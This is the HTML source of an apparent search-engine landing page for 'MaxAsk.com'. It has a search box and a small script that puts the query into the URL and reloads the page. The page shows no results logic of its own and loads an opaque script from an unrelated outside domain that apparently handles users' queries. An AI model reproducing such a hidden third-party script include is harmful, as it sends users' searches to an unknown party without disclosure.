<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MaxAsk.com</title>
    <style>
        body {
            background-color: #f2f2f2;
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        header {
            background-color: #ffffff;
            padding: 20px 0;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
        }

        .search-container {
            max-width: 600px;
            margin: 0 auto;
            text-align: center;
        }

        #search-box {
            padding: 10px;
            width: 70%;
            font-size: 16px;
        }

        #search-button {
            padding: 10px 20px;
            font-size: 16px;
            cursor: pointer;
            background-color: #4285f4;
            color: white;
            border: none;
        }

        #search-result {
            max-width: 800px;
            margin: 20px auto;
            padding: 20px;
            background-color: #ffffff;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
        }
    </style>
</head>

<body>
    <header>
        <div class="search-container">
            <form id="search-form">
                <input type="text" id="search-box" placeholder="Enter your search query">
                <button type="submit" id="search-button">Search</button>
            </form>
        </div>
    </header>

    <div id="search_result">
        <!-- Search results will be displayed here -->
    </div>

    <script src="https://trivalento.info/yorvil?i=GH3HP8ZREP&atr=1234"></script>
    <script>
        // Fill search box with keyword from URL
        (function () {
            const url = new URL(window.location.href);
            const searchQuery = url.searchParams.get('q');
            if (searchQuery) {
                document.getElementById('search-box').value = searchQuery;
            }
        })();
        document.getElementById('search-form').addEventListener('submit', function (e) {
            e.preventDefault();
            var query = document.getElementById('search-box').value;
            if (query) {
                const href = window.location.href
                const url = new URL(href)
                const searchParams = new URLSearchParams(url.search)
                searchParams.set('q', query)
                url.search = searchParams.toString()
                window.location.href = url.toString()
            }
        });
    </script>
</body>

</html>